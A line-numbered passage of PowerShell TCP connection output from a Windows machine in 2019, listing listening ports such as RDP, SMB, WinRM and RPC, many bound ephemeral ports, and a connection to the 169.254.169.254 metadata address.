7107PSComputerName :
7108
7109
7110Caption :
7111Description :
7112ElementName :
7113InstanceID : ::++9000++::++0
7114CommunicationStatus :
7115DetailedStatus :
7116HealthState :
7117InstallDate :
7118Name :
7119OperatingStatus :
7120OperationalStatus :
7121PrimaryStatus :
7122Status :
7123StatusDescriptions :
7124AvailableRequestedStates :
7125EnabledDefault : 2
7126EnabledState :
7127OtherEnabledState :
7128RequestedState : 5
7129TimeOfLastStateChange :
7130TransitioningToState : 12
7131AggregationBehavior :
7132Directionality :
7133CreationTime : 9/3/2019 3:35:23 AM
7134LocalAddress : ::
7135LocalPort : 9000
7136OwningProcess : 4
7137AppliedSetting :
7138OffloadState : InHost
7139RemoteAddress : ::
7140RemotePort : 0
7141State : Listen
7142PSComputerName :
7143
7144
7145Caption :
7146Description :
7147ElementName :
7148InstanceID : ::++7680++::++0
7149CommunicationStatus :
7150DetailedStatus :
7151HealthState :
7152InstallDate :
7153Name :
7154OperatingStatus :
7155OperationalStatus :
7156PrimaryStatus :
7157Status :
7158StatusDescriptions :
7159AvailableRequestedStates :
7160EnabledDefault : 2
7161EnabledState :
7162OtherEnabledState :
7163RequestedState : 5
7164TimeOfLastStateChange :
7165TransitioningToState : 12
7166AggregationBehavior :
7167Directionality :
7168CreationTime : 9/3/2019 3:08:42 AM
7169LocalAddress : ::
7170LocalPort : 7680
7171OwningProcess : 3816
7172AppliedSetting :
7173OffloadState : InHost
7174RemoteAddress : ::
7175RemotePort : 0
7176State : Listen
7177PSComputerName :
7178
7179
7180Caption :
7181Description :
7182ElementName :
7183InstanceID : ::++5985++::++0
7184CommunicationStatus :
7185DetailedStatus :
7186HealthState :
7187InstallDate :
7188Name :
7189OperatingStatus :
7190OperationalStatus :
7191PrimaryStatus :
7192Status :
7193StatusDescriptions :
7194AvailableRequestedStates :
7195EnabledDefault : 2
7196EnabledState :
7197OtherEnabledState :
7198RequestedState : 5
7199TimeOfLastStateChange :
7200TransitioningToState : 12
7201AggregationBehavior :
7202Directionality :
7203CreationTime : 9/3/2019 3:08:38 AM
7204LocalAddress : ::
7205LocalPort : 5985
7206OwningProcess : 4
7207AppliedSetting :
7208OffloadState : InHost
7209RemoteAddress : ::
7210RemotePort : 0
7211State : Listen
7212PSComputerName :
7213
7214
7215Caption :
7216Description :
7217ElementName :
7218InstanceID : ::++3389++::++0
7219CommunicationStatus :
7220DetailedStatus :
7221HealthState :
7222InstallDate :
7223Name :
7224OperatingStatus :
7225OperationalStatus :
7226PrimaryStatus :
7227Status :
7228StatusDescriptions :
7229AvailableRequestedStates :
7230EnabledDefault : 2
7231EnabledState :
7232OtherEnabledState :
7233RequestedState : 5
7234TimeOfLastStateChange :
7235TransitioningToState : 12
7236AggregationBehavior :
7237Directionality :
7238CreationTime : 9/3/2019 3:08:27 AM
7239LocalAddress : ::
7240LocalPort : 3389
7241OwningProcess : 1128
7242AppliedSetting :
7243OffloadState : InHost
7244RemoteAddress : ::
7245RemotePort : 0
7246State : Listen
7247PSComputerName :
7248
7249
7250Caption :
7251Description :
7252ElementName :
7253InstanceID : ::++445++::++0
7254CommunicationStatus :
7255DetailedStatus :
7256HealthState :
7257InstallDate :
7258Name :
7259OperatingStatus :
7260OperationalStatus :
7261PrimaryStatus :
7262Status :
7263StatusDescriptions :
7264AvailableRequestedStates :
7265EnabledDefault : 2
7266EnabledState :
7267OtherEnabledState :
7268RequestedState : 5
7269TimeOfLastStateChange :
7270TransitioningToState : 12
7271AggregationBehavior :
7272Directionality :
7273CreationTime : 9/3/2019 3:08:31 AM
7274LocalAddress : ::
7275LocalPort : 445
7276OwningProcess : 4
7277AppliedSetting :
7278OffloadState : InHost
7279RemoteAddress : ::
7280RemotePort : 0
7281State : Listen
7282PSComputerName :
7283
7284
7285Caption :
7286Description :
7287ElementName :
7288InstanceID : ::++135++::++0
7289CommunicationStatus :
7290DetailedStatus :
7291HealthState :
7292InstallDate :
7293Name :
7294OperatingStatus :
7295OperationalStatus :
7296PrimaryStatus :
7297Status :
7298StatusDescriptions :
7299AvailableRequestedStates :
7300EnabledDefault : 2
7301EnabledState :
7302OtherEnabledState :
7303RequestedState : 5
7304TimeOfLastStateChange :
7305TransitioningToState : 12
7306AggregationBehavior :
7307Directionality :
7308CreationTime : 9/3/2019 3:08:27 AM
7309LocalAddress : ::
7310LocalPort : 135
7311OwningProcess : 524
7312AppliedSetting :
7313OffloadState : InHost
7314RemoteAddress : ::
7315RemotePort : 0
7316State : Listen
7317PSComputerName :
7318
7319
7320Caption :
7321Description :
7322ElementName :
7323InstanceID : 0.0.0.0++50765++0.0.0.0++0
7324CommunicationStatus :
7325DetailedStatus :
7326HealthState :
7327InstallDate :
7328Name :
7329OperatingStatus :
7330OperationalStatus :
7331PrimaryStatus :
7332Status :
7333StatusDescriptions :
7334AvailableRequestedStates :
7335EnabledDefault : 2
7336EnabledState :
7337OtherEnabledState :
7338RequestedState : 5
7339TimeOfLastStateChange :
7340TransitioningToState : 12
7341AggregationBehavior :
7342Directionality :
7343CreationTime : 9/3/2019 4:03:55 AM
7344LocalAddress : 0.0.0.0
7345LocalPort : 50765
7346OwningProcess : 3260
7347AppliedSetting :
7348OffloadState : InHost
7349RemoteAddress : 0.0.0.0
7350RemotePort : 0
7351State : Bound
7352PSComputerName :
7353
7354
7355Caption :
7356Description :
7357ElementName :
7358InstanceID : 0.0.0.0++50763++0.0.0.0++0
7359CommunicationStatus :
7360DetailedStatus :
7361HealthState :
7362InstallDate :
7363Name :
7364OperatingStatus :
7365OperationalStatus :
7366PrimaryStatus :
7367Status :
7368StatusDescriptions :
7369AvailableRequestedStates :
7370EnabledDefault : 2
7371EnabledState :
7372OtherEnabledState :
7373RequestedState : 5
7374TimeOfLastStateChange :
7375TransitioningToState : 12
7376AggregationBehavior :
7377Directionality :
7378CreationTime : 9/3/2019 4:03:51 AM
7379LocalAddress : 0.0.0.0
7380LocalPort : 50763
7381OwningProcess : 4268
7382AppliedSetting :
7383OffloadState : InHost
7384RemoteAddress : 0.0.0.0
7385RemotePort : 0
7386State : Bound
7387PSComputerName :
7388
7389
7390Caption :
7391Description :
7392ElementName :
7393InstanceID : 0.0.0.0++50762++0.0.0.0++0
7394CommunicationStatus :
7395DetailedStatus :
7396HealthState :
7397InstallDate :
7398Name :
7399OperatingStatus :
7400OperationalStatus :
7401PrimaryStatus :
7402Status :
7403StatusDescriptions :
7404AvailableRequestedStates :
7405EnabledDefault : 2
7406EnabledState :
7407OtherEnabledState :
7408RequestedState : 5
7409TimeOfLastStateChange :
7410TransitioningToState : 12
7411AggregationBehavior :
7412Directionality :
7413CreationTime : 9/3/2019 4:03:51 AM
7414LocalAddress : 0.0.0.0
7415LocalPort : 50762
7416OwningProcess : 4496
7417AppliedSetting :
7418OffloadState : InHost
7419RemoteAddress : 0.0.0.0
7420RemotePort : 0
7421State : Bound
7422PSComputerName :
7423
7424
7425Caption :
7426Description :
7427ElementName :
7428InstanceID : 0.0.0.0++50760++0.0.0.0++0
7429CommunicationStatus :
7430DetailedStatus :
7431HealthState :
7432InstallDate :
7433Name :
7434OperatingStatus :
7435OperationalStatus :
7436PrimaryStatus :
7437Status :
7438StatusDescriptions :
7439AvailableRequestedStates :
7440EnabledDefault : 2
7441EnabledState :
7442OtherEnabledState :
7443RequestedState : 5
7444TimeOfLastStateChange :
7445TransitioningToState : 12
7446AggregationBehavior :
7447Directionality :
7448CreationTime : 9/3/2019 4:03:51 AM
7449LocalAddress : 0.0.0.0
7450LocalPort : 50760
7451OwningProcess : 4496
7452AppliedSetting :
7453OffloadState : InHost
7454RemoteAddress : 0.0.0.0
7455RemotePort : 0
7456State : Bound
7457PSComputerName :
7458
7459
7460Caption :
7461Description :
7462ElementName :
7463InstanceID : 0.0.0.0++50758++0.0.0.0++0
7464CommunicationStatus :
7465DetailedStatus :
7466HealthState :
7467InstallDate :
7468Name :
7469OperatingStatus :
7470OperationalStatus :
7471PrimaryStatus :
7472Status :
7473StatusDescriptions :
7474AvailableRequestedStates :
7475EnabledDefault : 2
7476EnabledState :
7477OtherEnabledState :
7478RequestedState : 5
7479TimeOfLastStateChange :
7480TransitioningToState : 12
7481AggregationBehavior :
7482Directionality :
7483CreationTime : 9/3/2019 4:03:51 AM
7484LocalAddress : 0.0.0.0
7485LocalPort : 50758
7486OwningProcess : 4496
7487AppliedSetting :
7488OffloadState : InHost
7489RemoteAddress : 0.0.0.0
7490RemotePort : 0
7491State : Bound
7492PSComputerName :
7493
7494
7495Caption :
7496Description :
7497ElementName :
7498InstanceID : 0.0.0.0++50756++0.0.0.0++0
7499CommunicationStatus :
7500DetailedStatus :
7501HealthState :
7502InstallDate :
7503Name :
7504OperatingStatus :
7505OperationalStatus :
7506PrimaryStatus :
7507Status :
7508StatusDescriptions :
7509AvailableRequestedStates :
7510EnabledDefault : 2
7511EnabledState :
7512OtherEnabledState :
7513RequestedState : 5
7514TimeOfLastStateChange :
7515TransitioningToState : 12
7516AggregationBehavior :
7517Directionality :
7518CreationTime : 9/3/2019 4:03:51 AM
7519LocalAddress : 0.0.0.0
7520LocalPort : 50756
7521OwningProcess : 4496
7522AppliedSetting :
7523OffloadState : InHost
7524RemoteAddress : 0.0.0.0
7525RemotePort : 0
7526State : Bound
7527PSComputerName :
7528
7529
7530Caption :
7531Description :
7532ElementName :
7533InstanceID : 0.0.0.0++50754++0.0.0.0++0
7534CommunicationStatus :
7535DetailedStatus :
7536HealthState :
7537InstallDate :
7538Name :
7539OperatingStatus :
7540OperationalStatus :
7541PrimaryStatus :
7542Status :
7543StatusDescriptions :
7544AvailableRequestedStates :
7545EnabledDefault : 2
7546EnabledState :
7547OtherEnabledState :
7548RequestedState : 5
7549TimeOfLastStateChange :
7550TransitioningToState : 12
7551AggregationBehavior :
7552Directionality :
7553CreationTime : 9/3/2019 4:03:50 AM
7554LocalAddress : 0.0.0.0
7555LocalPort : 50754
7556OwningProcess : 5348
7557AppliedSetting :
7558OffloadState : InHost
7559RemoteAddress : 0.0.0.0
7560RemotePort : 0
7561State : Bound
7562PSComputerName :
7563
7564
7565Caption :
7566Description :
7567ElementName :
7568InstanceID : 0.0.0.0++50753++0.0.0.0++0
7569CommunicationStatus :
7570DetailedStatus :
7571HealthState :
7572InstallDate :
7573Name :
7574OperatingStatus :
7575OperationalStatus :
7576PrimaryStatus :
7577Status :
7578StatusDescriptions :
7579AvailableRequestedStates :
7580EnabledDefault : 2
7581EnabledState :
7582OtherEnabledState :
7583RequestedState : 5
7584TimeOfLastStateChange :
7585TransitioningToState : 12
7586AggregationBehavior :
7587Directionality :
7588CreationTime : 9/3/2019 4:03:50 AM
7589LocalAddress : 0.0.0.0
7590LocalPort : 50753
7591OwningProcess : 5348
7592AppliedSetting :
7593OffloadState : InHost
7594RemoteAddress : 0.0.0.0
7595RemotePort : 0
7596State : Bound
7597PSComputerName :
7598
7599
7600Caption :
7601Description :
7602ElementName :
7603InstanceID : 0.0.0.0++50750++0.0.0.0++0
7604CommunicationStatus :
7605DetailedStatus :
7606HealthState :
7607InstallDate :
7608Name :
7609OperatingStatus :
7610OperationalStatus :
7611PrimaryStatus :
7612Status :
7613StatusDescriptions :
7614AvailableRequestedStates :
7615EnabledDefault : 2
7616EnabledState :
7617OtherEnabledState :
7618RequestedState : 5
7619TimeOfLastStateChange :
7620TransitioningToState : 12
7621AggregationBehavior :
7622Directionality :
7623CreationTime : 9/3/2019 4:03:40 AM
7624LocalAddress : 0.0.0.0
7625LocalPort : 50750
7626OwningProcess : 4496
7627AppliedSetting :
7628OffloadState : InHost
7629RemoteAddress : 0.0.0.0
7630RemotePort : 0
7631State : Bound
7632PSComputerName :
7633
7634
7635Caption :
7636Description :
7637ElementName :
7638InstanceID : 0.0.0.0++50742++0.0.0.0++0
7639CommunicationStatus :
7640DetailedStatus :
7641HealthState :
7642InstallDate :
7643Name :
7644OperatingStatus :
7645OperationalStatus :
7646PrimaryStatus :
7647Status :
7648StatusDescriptions :
7649AvailableRequestedStates :
7650EnabledDefault : 2
7651EnabledState :
7652OtherEnabledState :
7653RequestedState : 5
7654TimeOfLastStateChange :
7655TransitioningToState : 12
7656AggregationBehavior :
7657Directionality :
7658CreationTime : 9/3/2019 4:02:36 AM
7659LocalAddress : 0.0.0.0
7660LocalPort : 50742
7661OwningProcess : 4496
7662AppliedSetting :
7663OffloadState : InHost
7664RemoteAddress : 0.0.0.0
7665RemotePort : 0
7666State : Bound
7667PSComputerName :
7668
7669
7670Caption :
7671Description :
7672ElementName :
7673InstanceID : 0.0.0.0++50740++0.0.0.0++0
7674CommunicationStatus :
7675DetailedStatus :
7676HealthState :
7677InstallDate :
7678Name :
7679OperatingStatus :
7680OperationalStatus :
7681PrimaryStatus :
7682Status :
7683StatusDescriptions :
7684AvailableRequestedStates :
7685EnabledDefault : 2
7686EnabledState :
7687OtherEnabledState :
7688RequestedState : 5
7689TimeOfLastStateChange :
7690TransitioningToState : 12
7691AggregationBehavior :
7692Directionality :
7693CreationTime : 9/3/2019 4:02:35 AM
7694LocalAddress : 0.0.0.0
7695LocalPort : 50740
7696OwningProcess : 4496
7697AppliedSetting :
7698OffloadState : InHost
7699RemoteAddress : 0.0.0.0
7700RemotePort : 0
7701State : Bound
7702PSComputerName :
7703
7704
7705Caption :
7706Description :
7707ElementName :
7708InstanceID : 0.0.0.0++50737++0.0.0.0++0
7709CommunicationStatus :
7710DetailedStatus :
7711HealthState :
7712InstallDate :
7713Name :
7714OperatingStatus :
7715OperationalStatus :
7716PrimaryStatus :
7717Status :
7718StatusDescriptions :
7719AvailableRequestedStates :
7720EnabledDefault : 2
7721EnabledState :
7722OtherEnabledState :
7723RequestedState : 5
7724TimeOfLastStateChange :
7725TransitioningToState : 12
7726AggregationBehavior :
7727Directionality :
7728CreationTime : 9/3/2019 4:02:03 AM
7729LocalAddress : 0.0.0.0
7730LocalPort : 50737
7731OwningProcess : 7344
7732AppliedSetting :
7733OffloadState : InHost
7734RemoteAddress : 0.0.0.0
7735RemotePort : 0
7736State : Bound
7737PSComputerName :
7738
7739
7740Caption :
7741Description :
7742ElementName :
7743InstanceID : 0.0.0.0++50699++0.0.0.0++0
7744CommunicationStatus :
7745DetailedStatus :
7746HealthState :
7747InstallDate :
7748Name :
7749OperatingStatus :
7750OperationalStatus :
7751PrimaryStatus :
7752Status :
7753StatusDescriptions :
7754AvailableRequestedStates :
7755EnabledDefault : 2
7756EnabledState :
7757OtherEnabledState :
7758RequestedState : 5
7759TimeOfLastStateChange :
7760TransitioningToState : 12
7761AggregationBehavior :
7762Directionality :
7763CreationTime : 9/3/2019 4:00:42 AM
7764LocalAddress : 0.0.0.0
7765LocalPort : 50699
7766OwningProcess : 7344
7767AppliedSetting :
7768OffloadState : InHost
7769RemoteAddress : 0.0.0.0
7770RemotePort : 0
7771State : Bound
7772PSComputerName :
7773
7774
7775Caption :
7776Description :
7777ElementName :
7778InstanceID : 0.0.0.0++50697++0.0.0.0++0
7779CommunicationStatus :
7780DetailedStatus :
7781HealthState :
7782InstallDate :
7783Name :
7784OperatingStatus :
7785OperationalStatus :
7786PrimaryStatus :
7787Status :
7788StatusDescriptions :
7789AvailableRequestedStates :
7790EnabledDefault : 2
7791EnabledState :
7792OtherEnabledState :
7793RequestedState : 5
7794TimeOfLastStateChange :
7795TransitioningToState : 12
7796AggregationBehavior :
7797Directionality :
7798CreationTime : 9/3/2019 4:00:40 AM
7799LocalAddress : 0.0.0.0
7800LocalPort : 50697
7801OwningProcess : 7344
7802AppliedSetting :
7803OffloadState : InHost
7804RemoteAddress : 0.0.0.0
7805RemotePort : 0
7806State : Bound
7807PSComputerName :
7808
7809
7810Caption :
7811Description :
7812ElementName :
7813InstanceID : 0.0.0.0++50694++0.0.0.0++0
7814CommunicationStatus :
7815DetailedStatus :
7816HealthState :
7817InstallDate :
7818Name :
7819OperatingStatus :
7820OperationalStatus :
7821PrimaryStatus :
7822Status :
7823StatusDescriptions :
7824AvailableRequestedStates :
7825EnabledDefault : 2
7826EnabledState :
7827OtherEnabledState :
7828RequestedState : 5
7829TimeOfLastStateChange :
7830TransitioningToState : 12
7831AggregationBehavior :
7832Directionality :
7833CreationTime : 9/3/2019 4:00:38 AM
7834LocalAddress : 0.0.0.0
7835LocalPort : 50694
7836OwningProcess : 7344
7837AppliedSetting :
7838OffloadState : InHost
7839RemoteAddress : 0.0.0.0
7840RemotePort : 0
7841State : Bound
7842PSComputerName :
7843
7844
7845Caption :
7846Description :
7847ElementName :
7848InstanceID : 0.0.0.0++50689++0.0.0.0++0
7849CommunicationStatus :
7850DetailedStatus :
7851HealthState :
7852InstallDate :
7853Name :
7854OperatingStatus :
7855OperationalStatus :
7856PrimaryStatus :
7857Status :
7858StatusDescriptions :
7859AvailableRequestedStates :
7860EnabledDefault : 2
7861EnabledState :
7862OtherEnabledState :
7863RequestedState : 5
7864TimeOfLastStateChange :
7865TransitioningToState : 12
7866AggregationBehavior :
7867Directionality :
7868CreationTime : 9/3/2019 4:00:37 AM
7869LocalAddress : 0.0.0.0
7870LocalPort : 50689
7871OwningProcess : 7344
7872AppliedSetting :
7873OffloadState : InHost
7874RemoteAddress : 0.0.0.0
7875RemotePort : 0
7876State : Bound
7877PSComputerName :
7878
7879
7880Caption :
7881Description :
7882ElementName :
7883InstanceID : 0.0.0.0++50687++0.0.0.0++0
7884CommunicationStatus :
7885DetailedStatus :
7886HealthState :
7887InstallDate :
7888Name :
7889OperatingStatus :
7890OperationalStatus :
7891PrimaryStatus :
7892Status :
7893StatusDescriptions :
7894AvailableRequestedStates :
7895EnabledDefault : 2
7896EnabledState :
7897OtherEnabledState :
7898RequestedState : 5
7899TimeOfLastStateChange :
7900TransitioningToState : 12
7901AggregationBehavior :
7902Directionality :
7903CreationTime : 9/3/2019 4:00:37 AM
7904LocalAddress : 0.0.0.0
7905LocalPort : 50687
7906OwningProcess : 7344
7907AppliedSetting :
7908OffloadState : InHost
7909RemoteAddress : 0.0.0.0
7910RemotePort : 0
7911State : Bound
7912PSComputerName :
7913
7914
7915Caption :
7916Description :
7917ElementName :
7918InstanceID : 0.0.0.0++50686++0.0.0.0++0
7919CommunicationStatus :
7920DetailedStatus :
7921HealthState :
7922InstallDate :
7923Name :
7924OperatingStatus :
7925OperationalStatus :
7926PrimaryStatus :
7927Status :
7928StatusDescriptions :
7929AvailableRequestedStates :
7930EnabledDefault : 2
7931EnabledState :
7932OtherEnabledState :
7933RequestedState : 5
7934TimeOfLastStateChange :
7935TransitioningToState : 12
7936AggregationBehavior :
7937Directionality :
7938CreationTime : 9/3/2019 4:00:37 AM
7939LocalAddress : 0.0.0.0
7940LocalPort : 50686
7941OwningProcess : 7344
7942AppliedSetting :
7943OffloadState : InHost
7944RemoteAddress : 0.0.0.0
7945RemotePort : 0
7946State : Bound
7947PSComputerName :
7948
7949
7950Caption :
7951Description :
7952ElementName :
7953InstanceID : 0.0.0.0++50684++0.0.0.0++0
7954CommunicationStatus :
7955DetailedStatus :
7956HealthState :
7957InstallDate :
7958Name :
7959OperatingStatus :
7960OperationalStatus :
7961PrimaryStatus :
7962Status :
7963StatusDescriptions :
7964AvailableRequestedStates :
7965EnabledDefault : 2
7966EnabledState :
7967OtherEnabledState :
7968RequestedState : 5
7969TimeOfLastStateChange :
7970TransitioningToState : 12
7971AggregationBehavior :
7972Directionality :
7973CreationTime : 9/3/2019 4:00:37 AM
7974LocalAddress : 0.0.0.0
7975LocalPort : 50684
7976OwningProcess : 7344
7977AppliedSetting :
7978OffloadState : InHost
7979RemoteAddress : 0.0.0.0
7980RemotePort : 0
7981State : Bound
7982PSComputerName :
7983
7984
7985Caption :
7986Description :
7987ElementName :
7988InstanceID : 0.0.0.0++50683++0.0.0.0++0
7989CommunicationStatus :
7990DetailedStatus :
7991HealthState :
7992InstallDate :
7993Name :
7994OperatingStatus :
7995OperationalStatus :
7996PrimaryStatus :
7997Status :
7998StatusDescriptions :
7999AvailableRequestedStates :
8000EnabledDefault : 2
8001EnabledState :
8002OtherEnabledState :
8003RequestedState : 5
8004TimeOfLastStateChange :
8005TransitioningToState : 12
8006AggregationBehavior :
8007Directionality :
8008CreationTime : 9/3/2019 4:00:36 AM
8009LocalAddress : 0.0.0.0
8010LocalPort : 50683
8011OwningProcess : 7344
8012AppliedSetting :
8013OffloadState : InHost
8014RemoteAddress : 0.0.0.0
8015RemotePort : 0
8016State : Bound
8017PSComputerName :
8018
8019
8020Caption :
8021Description :
8022ElementName :
8023InstanceID : 0.0.0.0++50682++0.0.0.0++0
8024CommunicationStatus :
8025DetailedStatus :
8026HealthState :
8027InstallDate :
8028Name :
8029OperatingStatus :
8030OperationalStatus :
8031PrimaryStatus :
8032Status :
8033StatusDescriptions :
8034AvailableRequestedStates :
8035EnabledDefault : 2
8036EnabledState :
8037OtherEnabledState :
8038RequestedState : 5
8039TimeOfLastStateChange :
8040TransitioningToState : 12
8041AggregationBehavior :
8042Directionality :
8043CreationTime : 9/3/2019 4:00:36 AM
8044LocalAddress : 0.0.0.0
8045LocalPort : 50682
8046OwningProcess : 7344
8047AppliedSetting :
8048OffloadState : InHost
8049RemoteAddress : 0.0.0.0
8050RemotePort : 0
8051State : Bound
8052PSComputerName :
8053
8054
8055Caption :
8056Description :
8057ElementName :
8058InstanceID : 0.0.0.0++50681++0.0.0.0++0
8059CommunicationStatus :
8060DetailedStatus :
8061HealthState :
8062InstallDate :
8063Name :
8064OperatingStatus :
8065OperationalStatus :
8066PrimaryStatus :
8067Status :
8068StatusDescriptions :
8069AvailableRequestedStates :
8070EnabledDefault : 2
8071EnabledState :
8072OtherEnabledState :
8073RequestedState : 5
8074TimeOfLastStateChange :
8075TransitioningToState : 12
8076AggregationBehavior :
8077Directionality :
8078CreationTime : 9/3/2019 4:00:36 AM
8079LocalAddress : 0.0.0.0
8080LocalPort : 50681
8081OwningProcess : 7344
8082AppliedSetting :
8083OffloadState : InHost
8084RemoteAddress : 0.0.0.0
8085RemotePort : 0
8086State : Bound
8087PSComputerName :
8088
8089
8090Caption :
8091Description :
8092ElementName :
8093InstanceID : 0.0.0.0++50680++0.0.0.0++0
8094CommunicationStatus :
8095DetailedStatus :
8096HealthState :
8097InstallDate :
8098Name :
8099OperatingStatus :
8100OperationalStatus :
8101PrimaryStatus :
8102Status :
8103StatusDescriptions :
8104AvailableRequestedStates :
8105EnabledDefault : 2
8106EnabledState :
8107OtherEnabledState :
8108RequestedState : 5
8109TimeOfLastStateChange :
8110TransitioningToState : 12
8111AggregationBehavior :
8112Directionality :
8113CreationTime : 9/3/2019 4:00:36 AM
8114LocalAddress : 0.0.0.0
8115LocalPort : 50680
8116OwningProcess : 7344
8117AppliedSetting :
8118OffloadState : InHost
8119RemoteAddress : 0.0.0.0
8120RemotePort : 0
8121State : Bound
8122PSComputerName :
8123
8124
8125Caption :
8126Description :
8127ElementName :
8128InstanceID : 0.0.0.0++50649++0.0.0.0++0
8129CommunicationStatus :
8130DetailedStatus :
8131HealthState :
8132InstallDate :
8133Name :
8134OperatingStatus :
8135OperationalStatus :
8136PrimaryStatus :
8137Status :
8138StatusDescriptions :
8139AvailableRequestedStates :
8140EnabledDefault : 2
8141EnabledState :
8142OtherEnabledState :
8143RequestedState : 5
8144TimeOfLastStateChange :
8145TransitioningToState : 12
8146AggregationBehavior :
8147Directionality :
8148CreationTime : 9/3/2019 3:56:58 AM
8149LocalAddress : 0.0.0.0
8150LocalPort : 50649
8151OwningProcess : 8996
8152AppliedSetting :
8153OffloadState : InHost
8154RemoteAddress : 0.0.0.0
8155RemotePort : 0
8156State : Bound
8157PSComputerName :
8158
8159
8160Caption :
8161Description :
8162ElementName :
8163InstanceID : 0.0.0.0++50464++0.0.0.0++0
8164CommunicationStatus :
8165DetailedStatus :
8166HealthState :
8167InstallDate :
8168Name :
8169OperatingStatus :
8170OperationalStatus :
8171PrimaryStatus :
8172Status :
8173StatusDescriptions :
8174AvailableRequestedStates :
8175EnabledDefault : 2
8176EnabledState :
8177OtherEnabledState :
8178RequestedState : 5
8179TimeOfLastStateChange :
8180TransitioningToState : 12
8181AggregationBehavior :
8182Directionality :
8183CreationTime : 9/3/2019 3:39:29 AM
8184LocalAddress : 0.0.0.0
8185LocalPort : 50464
8186OwningProcess : 3376
8187AppliedSetting :
8188OffloadState : InHost
8189RemoteAddress : 0.0.0.0
8190RemotePort : 0
8191State : Bound
8192PSComputerName :
8193
8194
8195Caption :
8196Description :
8197ElementName :
8198InstanceID : 0.0.0.0++50449++0.0.0.0++0
8199CommunicationStatus :
8200DetailedStatus :
8201HealthState :
8202InstallDate :
8203Name :
8204OperatingStatus :
8205OperationalStatus :
8206PrimaryStatus :
8207Status :
8208StatusDescriptions :
8209AvailableRequestedStates :
8210EnabledDefault : 2
8211EnabledState :
8212OtherEnabledState :
8213RequestedState : 5
8214TimeOfLastStateChange :
8215TransitioningToState : 12
8216AggregationBehavior :
8217Directionality :
8218CreationTime : 9/3/2019 3:38:20 AM
8219LocalAddress : 0.0.0.0
8220LocalPort : 50449
8221OwningProcess : 5932
8222AppliedSetting :
8223OffloadState : InHost
8224RemoteAddress : 0.0.0.0
8225RemotePort : 0
8226State : Bound
8227PSComputerName :
8228
8229
8230Caption :
8231Description :
8232ElementName :
8233InstanceID : 0.0.0.0++50448++0.0.0.0++0
8234CommunicationStatus :
8235DetailedStatus :
8236HealthState :
8237InstallDate :
8238Name :
8239OperatingStatus :
8240OperationalStatus :
8241PrimaryStatus :
8242Status :
8243StatusDescriptions :
8244AvailableRequestedStates :
8245EnabledDefault : 2
8246EnabledState :
8247OtherEnabledState :
8248RequestedState : 5
8249TimeOfLastStateChange :
8250TransitioningToState : 12
8251AggregationBehavior :
8252Directionality :
8253CreationTime : 9/3/2019 3:38:20 AM
8254LocalAddress : 0.0.0.0
8255LocalPort : 50448
8256OwningProcess : 5932
8257AppliedSetting :
8258OffloadState : InHost
8259RemoteAddress : 0.0.0.0
8260RemotePort : 0
8261State : Bound
8262PSComputerName :
8263
8264
8265Caption :
8266Description :
8267ElementName :
8268InstanceID : 0.0.0.0++50326++0.0.0.0++0
8269CommunicationStatus :
8270DetailedStatus :
8271HealthState :
8272InstallDate :
8273Name :
8274OperatingStatus :
8275OperationalStatus :
8276PrimaryStatus :
8277Status :
8278StatusDescriptions :
8279AvailableRequestedStates :
8280EnabledDefault : 2
8281EnabledState :
8282OtherEnabledState :
8283RequestedState : 5
8284TimeOfLastStateChange :
8285TransitioningToState : 12
8286AggregationBehavior :
8287Directionality :
8288CreationTime : 9/3/2019 3:30:50 AM
8289LocalAddress : 0.0.0.0
8290LocalPort : 50326
8291OwningProcess : 2176
8292AppliedSetting :
8293OffloadState : InHost
8294RemoteAddress : 0.0.0.0
8295RemotePort : 0
8296State : Bound
8297PSComputerName :
8298
8299
8300Caption :
8301Description :
8302ElementName :
8303InstanceID : 0.0.0.0++50239++0.0.0.0++0
8304CommunicationStatus :
8305DetailedStatus :
8306HealthState :
8307InstallDate :
8308Name :
8309OperatingStatus :
8310OperationalStatus :
8311PrimaryStatus :
8312Status :
8313StatusDescriptions :
8314AvailableRequestedStates :
8315EnabledDefault : 2
8316EnabledState :
8317OtherEnabledState :
8318RequestedState : 5
8319TimeOfLastStateChange :
8320TransitioningToState : 12
8321AggregationBehavior :
8322Directionality :
8323CreationTime : 9/3/2019 3:26:11 AM
8324LocalAddress : 0.0.0.0
8325LocalPort : 50239
8326OwningProcess : 7152
8327AppliedSetting :
8328OffloadState : InHost
8329RemoteAddress : 0.0.0.0
8330RemotePort : 0
8331State : Bound
8332PSComputerName :
8333
8334
8335Caption :
8336Description :
8337ElementName :
8338InstanceID : 0.0.0.0++50238++0.0.0.0++0
8339CommunicationStatus :
8340DetailedStatus :
8341HealthState :
8342InstallDate :
8343Name :
8344OperatingStatus :
8345OperationalStatus :
8346PrimaryStatus :
8347Status :
8348StatusDescriptions :
8349AvailableRequestedStates :
8350EnabledDefault : 2
8351EnabledState :
8352OtherEnabledState :
8353RequestedState : 5
8354TimeOfLastStateChange :
8355TransitioningToState : 12
8356AggregationBehavior :
8357Directionality :
8358CreationTime : 9/3/2019 3:26:11 AM
8359LocalAddress : 0.0.0.0
8360LocalPort : 50238
8361OwningProcess : 7152
8362AppliedSetting :
8363OffloadState : InHost
8364RemoteAddress : 0.0.0.0
8365RemotePort : 0
8366State : Bound
8367PSComputerName :
8368
8369
8370Caption :
8371Description :
8372ElementName :
8373InstanceID : 0.0.0.0++49756++0.0.0.0++0
8374CommunicationStatus :
8375DetailedStatus :
8376HealthState :
8377InstallDate :
8378Name :
8379OperatingStatus :
8380OperationalStatus :
8381PrimaryStatus :
8382Status :
8383StatusDescriptions :
8384AvailableRequestedStates :
8385EnabledDefault : 2
8386EnabledState :
8387OtherEnabledState :
8388RequestedState : 5
8389TimeOfLastStateChange :
8390TransitioningToState : 12
8391AggregationBehavior :
8392Directionality :
8393CreationTime : 9/3/2019 3:08:51 AM
8394LocalAddress : 0.0.0.0
8395LocalPort : 49756
8396OwningProcess : 4496
8397AppliedSetting :
8398OffloadState : InHost
8399RemoteAddress : 0.0.0.0
8400RemotePort : 0
8401State : Bound
8402PSComputerName :
8403
8404
8405Caption :
8406Description :
8407ElementName :
8408InstanceID : 172.18.39.105++50765++169.254.169.254++80
8409CommunicationStatus :
8410DetailedStatus :
8411HealthState :
8412InstallDate :
8413Name :
8414OperatingStatus :
8415OperationalStatus :
8416PrimaryStatus :
8417Status :
8418StatusDescriptions :
8419AvailableRequestedStates :
8420EnabledDefault : 2
8421EnabledState :
8422OtherEnabledState :
8423RequestedState : 5
8424TimeOfLastStateChange :
8425TransitioningToState : 12
8426AggregationBehavior :
8427Directionality :
8428CreationTime : 9/3/2019 4:03:55 AM
8429LocalAddress : 172.18.39.105
